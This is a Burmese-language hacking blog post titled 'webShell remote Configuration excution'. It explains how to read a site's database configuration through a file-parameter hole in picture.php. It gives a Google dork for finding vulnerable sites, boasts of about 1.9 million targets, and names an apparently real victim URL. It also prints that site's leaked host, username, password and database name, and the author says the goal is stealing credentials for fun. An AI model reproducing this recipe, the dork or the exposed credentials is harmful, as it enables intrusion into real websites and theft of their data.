webShell remote Configuration excution

webShell 4.O remote Configuration excution

vulnerable url : http://website.com/picture.php?file=_mysql.php

 

ကဲစလုိက္ရေအာင္ဗ်ာ..ဒါက webShell 4.0 သုံးထားတဲ့ website ေတြကို ကစ္နည္းပါဘဲ..

ကြ်န္ေတာ္တုိ ့ေတြ username : Password : Database : စတာေတြကို ခုိးယူၾကည့္၇ွ ့ရေအာင္ဗ်ာ..

အပ်င္းေျပေပ့ါ ... (ပာိာိ ၀ါသနာ ၾကီးလြန္းလို ့ပါဂ်ာ)

ကဲေအာက္ကလင့္ကိုသြားလုိက္ပါ..

http://r0fld2.uw.hu/picture.php?file=_mysql.php

ဥပမာ အေနန ဲ့ျပသြားမယ္ေနာ္ 

ေၾသာ္ အလြယ္စမ္းဖုိ ့ dork ေပးဖုိ ့ေတာင္ေမ့သြားတယ္..

 

 Dorks :        "inurl:/picture.php?file="

ဒါဆုိ လင့္ေပါင္း 1,920,000 ရွိေနေသးပါတယ္... ကြ်န္ေတာ္ဒီဘေလာ့တင္တဲ့အခ်ိန္ ကပာာကိုေျပာတာေနာ္..

ကြ်န္ေတာ္ဥပမာ ျပထားတာ့လင့္ကို သြားလုိက္ပါ လင့္အမွန္ကေတာ့

http://r0fld2.uw.hu/picture.php?file= ပါ ကြ်န္ေတာ္က _mysql.php ေလးထပ္ျဖည့္ထည့္ေပးလုိက္ပါတာပါ

ဒါမွမပာုတ္လဲ ဒီလုိ လုပ္လုိက္ပါ..

/picture.php?file=_mysql.php ကိုထည့္ေပးလုိက္ပါ..

http://someone.com/picture.php?file=_mysql.php

လုိမ်ဳိးေပ့ါ ဗ်ာ.. ဒါဆုိရင္ ကြ်န္ေတာ္ဥပမာ ျပတဲ့လင့္ကိုသြားလုိက္ပါ..

ျပီးရင္ Ctrl + u နုိပ္ၾကည့္လုိက္ပါ.. ေအာက္ကပုံေလးလုိျမင္ရပါမယ္...

 အုိေက .. 

<?php
$host = "sql4.ultraweb.hu";
$user = "r0fld2";
$pwd = "ladder";
$db = "r0fld2";
define(PREFIX, 'webs_');
?>

လုိ ့ျမင္ရမွာပါ..

ဒီေတာ့ ကြ်န္ေတာ္တို ့ username : , Password ကရျပီ ဆုိေတာ့ ဘာဆက္လုပ္ၾကမလဲ????

ေပ်ာ္၇ႊင္ပါေစဗ်ာ.

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com